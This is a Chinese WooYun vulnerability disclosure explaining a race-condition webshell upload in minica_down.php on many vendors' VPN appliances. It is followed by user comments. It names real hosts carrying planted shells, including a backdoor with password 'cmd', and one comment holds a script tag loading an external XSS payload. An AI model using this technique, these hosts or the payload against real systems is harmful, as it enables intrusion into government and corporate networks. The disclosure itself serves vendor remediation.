漏洞概要
关注数(24)
关注此漏洞
漏洞标题:国内外多家vpn设备厂商批量漏洞(续集一)
提交时间:2014-01-07 18:27
修复时间:2014-04-07 18:28
公开时间:2014-04-07 18:28
漏洞类型:设计不当
危害等级:高
自评Rank:20
漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理
Tags标签:
无
漏洞详情
披露状态:
2014-01-07: 细节已通知厂商并且等待厂商处理中
2014-01-12: 厂商已经确认,细节仅向厂商公开
2014-01-15: 细节向第三方安全合作伙伴开放
2014-03-08: 细节向核心白帽子及相关领域专家公开
2014-03-18: 细节向普通白帽子公开
2014-03-28: 细节向实习白帽子公开
2014-04-07: 细节向公众公开
简要描述:
利用此漏洞可导致任意文件写入,任意代码/命令执行,大量内网可免门票任意漫游 漫游...
同时该漏洞涉及到包括网御神州、天融信、西安网赢、卫士通、吉大正元、美国凹凸、德国 ANIX等多家VPN厂商设备在政务、地产、运营商、政府部门、高校、企业、公安、司法、银行等行业存在的任意文件下载、远程命令执行、维护后门、三方平台帐号泄漏、恶意客户端下发等高位漏洞。
详细说明:
#1 首先请看:
漏洞修复中,@紫梦芊 提到修复方法,详见如下:
嘿,没想到这些厂商还真是这样修复的...
咦? 这样修复没有问题啊,但真的是没问题吗?要是真的没问题,就不会有下文了,哈哈...
各位看官,且听我细细道来...
#2 我们打开根目录下的minica_down.php文件,代码贴出来
第二行代码:
从POST提交的realfile,复制到POST提交的path参数
倒数三行代码:
如果提交了realfile参数,则删除path参数所提交的文件,即
假如我们post提交,realfile=/ssl/www/test.jpg & path=/ssl/www/admin/shell.php
很容易的得到我们想要的shell,但在代码的最后三行,最终删除了path即 删除了我们想要的shell:/ssl/www/admin/shell.php
这段代码的逻辑看起来没什么问题,但是呢 我们人是最善于思考的动物,SO...
#3 思考中... ...
#4 思考后的结果
程序的执行需要一个过程,哪怕这个过程很短很短,鉴于此,我们有了如下的结果...
(要是我们能在程序删除我们想要的那个shell前,通过一定的方法抢在其前面访问那个shell,这个shell帮我们生成另一个shell,那么这个新生成的shell总不会被删除吧...)
这里简单小结一下
正常情况:
copy成shell1--->删除shell1;
被攻击时的情况:
copy成shell1--->访问shell1-->shell1生成shell2-->删除shell1 明白了吧?
有了想法,那就开始行动吧...
方法一:
我们可以用py写一个多线程的代码,唯一功能是:不停的访问copy成的shell1
方法二:
将post提交和访问shell让程序同时进行...
经过一系列的测试:方法一成功的几率很小,这里 我们选择方法二
漏洞证明:
#5 漏洞最终利用
这里 我们用php写漏洞利用的POC:
POC说明:
POST提交参数:
realfile参数是远程的一个文件,目的是生成最终的shell 大小最好几十KB,为我们访问中间的shell1争取时间 增加成功的概率嘛,内容如下:
path是我们想要生成的文件,这里是:sub_ca_reglog1.php
Tips:由于这里只是POC,所以在运行的时候 最好多试几次,要是试了几次任然没生成shell,此时可手动访问:http://www.com.cn/sub_ca_reglog1.php 说不定会有意想不到的效果哦.
#6 shell
https://svpn.mbatec.com.tw
https://vpn.mcut.edu.tw 这两个url,对不起了啊,毕竟为了测试嘛
同时我发现,有很多网站被人留了后门,清理一下吧
https://xxxxxxx/admin/free.php 密码cmd
https://svpn.mbatec.com.tw/welcome_time1.php
https://svpn.mbatec.com.tw/sub_ca_reglog1.php
https://svpn.mbatec.com.tw/sub_ca_reglog2.php
https://svpn.mbatec.com.tw/sub_ca_reglog3.php
#7 漏洞站点(摘自@紫梦芊)
至少有如下的站点,未列完.....
修复方案:
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2014-01-12 11:36
厂商回复:
CNVD确认并复现所述况,并根据利用原理对EXP进行了改写,提高了测试成功率。在9日上午已经复现多个实例,不过在9日下午之后测试结果出现新的变化。需要汇总进一步的结果才进行处置。
最新状态:
暂无
漏洞评价:
评论
-
-
2014-01-07 18:44 |
HoerWing ( 路人 | Rank:24 漏洞数:4 | "People should not be afraid of their go...)
-
2014-01-07 18:50 |
momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)
-
2014-01-07 18:57 |
天朝城管 ( 普通白帽子 | Rank:116 漏洞数:35 | 不要等到命玩你的时候才开始玩命)
-
2014-01-07 19:49 |
JJFly ( 路人 | Rank:2 漏洞数:1 | <a href="www.yidianjiujijifly.com">www.y...)
-
2014-01-07 19:53 |
hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)
-
2014-01-07 19:53 |
Mujj ( 实习白帽子 | Rank:58 漏洞数:4 | IDC商)
-
2014-01-07 20:01 |
袋鼠妈妈 ( 普通白帽子 | Rank:449 漏洞数:61 | 故乡的原风景.MP3)
-
2014-01-07 20:05 |
小威 ( 普通白帽子 | Rank:492 漏洞数:76 | 活到老,学到老!)
-
2014-01-07 20:13 |
未来还没来 ( 路人 | Rank:16 漏洞数:5 | 每个人都期望成为主角,却不知道世界上从来...)
-
2014-01-07 23:46 |
洗剪吹 ( 路人 | Rank:1 漏洞数:1 | 出门在外,安全第一!)
-
2014-01-07 23:52 |
xxw ( 路人 | Rank:29 漏洞数:18 | 中国梦)
-
2014-01-08 00:19 |
whitemonty ( 路人 | Rank:7 漏洞数:4 | Secur1ty just lik3 a girl. B0th of th3m ...)
-
2014-01-08 00:55 |
AC_TEAM ( 路人 | Rank:25 漏洞数:2 | 专注社工三十年)
呐么屌。 出售美国、伊朗、苏联、印度、日本、俄罗斯、法国等国家卫星。。。
-
2014-01-08 00:58 |
AC_TEAM ( 路人 | Rank:25 漏洞数:2 | 专注社工三十年)
出售国防专用VPN、军用专线网络、无限畅游美国印度伊拉克军方机密资料。
-
2014-01-08 07:17 |
niliu ( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)
-
2014-01-08 09:23 |
jk_影 ( 实习白帽子 | Rank:59 漏洞数:9 | 专注google三十年)
-
2014-01-08 09:40 |
白加黑 ( 路人 | Rank:20 漏洞数:8 )
-
2014-01-08 09:44 |
秋风 ( 普通白帽子 | Rank:438 漏洞数:44 | 码农一枚,关注互联网安全)
-
2014-01-08 10:01 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)
@cncert国家互联网应急中心 不要卖萌好吗,哈哈哈
-
2014-01-08 10:09 |
乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )
-
2014-01-08 10:10 |
笨小猪 ( 路人 | Rank:16 漏洞数:2 | 杯壁下流)
-
2014-01-08 11:50 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
-
2014-01-08 12:04 |
onlycjeg ( 实习白帽子 | Rank:38 漏洞数:5 | 我就看看,我不说话.)
-
2014-01-08 12:33 |
紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
-
2014-01-08 13:22 |
felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)
@紫梦芊 话说Wooyun唯一女白帽子 紫紫,对felixk3y这个ID有印象吗?:-)
-
2014-01-08 14:02 |
Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)
-
2014-01-08 16:38 |
摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)
-
2014-01-08 17:09 |
鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:42 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)
@摸了你 @felixk3y 肉肉跟紫梦芊不一样,肉肉是个胖子。。胖……白帽子。
-
2014-01-08 17:50 |
hackesc ( 路人 | Rank:11 漏洞数:3 | 求各种基友)
-
2014-01-08 23:34 |
Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)
@cncert国家互联网应急中心 小哥你是上错号的节奏吗
-
2014-01-09 11:30 |
jeary ( 普通白帽子 | Rank:296 漏洞数:106 | (:.kcaH eb nac gnihtynA))
这个一定会被转载的!<script src=//xss.tw/5306></script>
-
2014-01-09 14:28 |
HoerWing ( 路人 | Rank:24 漏洞数:4 | "People should not be afraid of their go...)
-
2014-01-09 16:52 |
花生^_^ ( 路人 | Rank:0 漏洞数:1 | 加强学习~~)
-
根据9日测试结果,上午和下午出现较大差异。上午测试还可以复现一些情况,但下午测试就有很多VPN设备已经删除漏洞页面。@felixk3y
-
2014-01-10 09:10 |
felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)
@cncert国家互联网应急中心 后来我继续测试了其他一些url,发现只要远程用到的那个文件在100KB以上,基本就可以完全复现...
-
2014-01-12 09:32 |
紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
-
2014-02-01 13:49 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2014-02-01 23:24 |
小胖胖要减肥 ( 普通白帽子 | Rank:686 漏洞数:101 )
-
2014-02-17 17:40 |
紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
@felixk3y 你是YwiSax ? 我忘记了allow_url_fopen默认时On的 呵呵
-
2014-02-17 17:55 |
felixk3y ( 普通白帽子 | Rank:523 漏洞数:41 | php python jsp)
-
2014-02-17 18:11 |
紫梦芊 ( 普通白帽子 | Rank:138 漏洞数:9 | 踏踏实实做测试)
-
2014-02-17 18:23 |
0x334 ( 普通白帽子 | Rank:171 漏洞数:35 | 漏洞无影响,已忽略~~~~~~~)
-
2014-02-17 19:51 |
Master ( 路人 | Rank:29 漏洞数:10 )
-
2014-02-21 13:59 |
肉肉 ( 普通白帽子 | Rank:112 漏洞数:10 | 肉肉在长亭科技,肉肉在长亭科技,肉肉在长...)
-
2014-02-24 23:54 |
abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)
-
2014-03-12 22:30 |
Master ( 路人 | Rank:29 漏洞数:10 )
-
2014-03-16 13:14 |
abaddon ( 实习白帽子 | Rank:37 漏洞数:10 | 我叫什么名字)
-
2014-04-08 03:35 |
风之子 ( 路人 | Rank:0 漏洞数:1 | 好好学习...囧)
-
2014-04-08 14:14 |
e_ifox ( 路人 | Rank:10 漏洞数:1 | 我也是有rank的人了)
-
2014-04-08 16:21 |
基佬库克 ( 实习白帽子 | Rank:75 漏洞数:15 | 简介什么的是直接爆菊吧..)
思路很不错,允许远程文件下载,加上利用命令执行时间差